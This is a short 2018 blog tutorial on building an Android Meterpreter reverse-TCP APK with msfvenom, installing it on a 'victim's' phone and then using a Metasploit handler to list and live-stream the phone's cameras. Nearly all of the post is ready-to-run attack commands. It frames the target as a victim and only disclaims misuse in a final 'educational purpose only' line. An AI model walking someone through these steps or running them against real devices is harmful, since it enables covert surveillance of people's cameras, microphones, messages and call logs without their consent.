Android exploitation

  • CHS
  • 29th Jul 2018

Hacking android device through MSFvenom

Recently I came across this awesome payload from msfvenom which give you access to control the front and back camera, microphone, check victims call log, messages etc. Thought its worth sharing, here is what to do :

Things required

  • 1. Linux machine with Metasploit in it
  • 2. A medium to transfer the payload to victims phone (USB, google drive etc. Gmail won't work)
  • 3. victims phone to install the created apk (doesn't take much time probably less than 1 min)

Process

open the terminal and enter the command :

msfvenom –p android/meterpreter/reverse_tcp LHOST=**Your IP addr.** LPORT=4444 R > pentest.apk

You will find the apk file ready in the directory you created it. The only this left is to transfer it the victims phone and install it. Once the installation is done come back to your system and open the msfconsole

msfconsole

msfconsole

Once you are in Metasploit

run the following commands :

use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST **YOUR_IP_addr.**
set LPORT 4444
exploit

msfconsole

Then you will get a meterpreter session. You can type help to see the commands you can enter. Let's try to access the camera of the victim

webcam-list

you can see the cameras. For me, they are Back Camera and Front Camera
Let's try to access back camera

webcam_stream Back Camera   

msfconsole

Then your browser will pop us showing us the live stream from the victims back cam.
There are many options to mess up with the victim's phone.Try to explore your self :)


CHS

Here victims phone means a phone to test not a real persons phone.This post is for educational purpose only don't try it on others phones.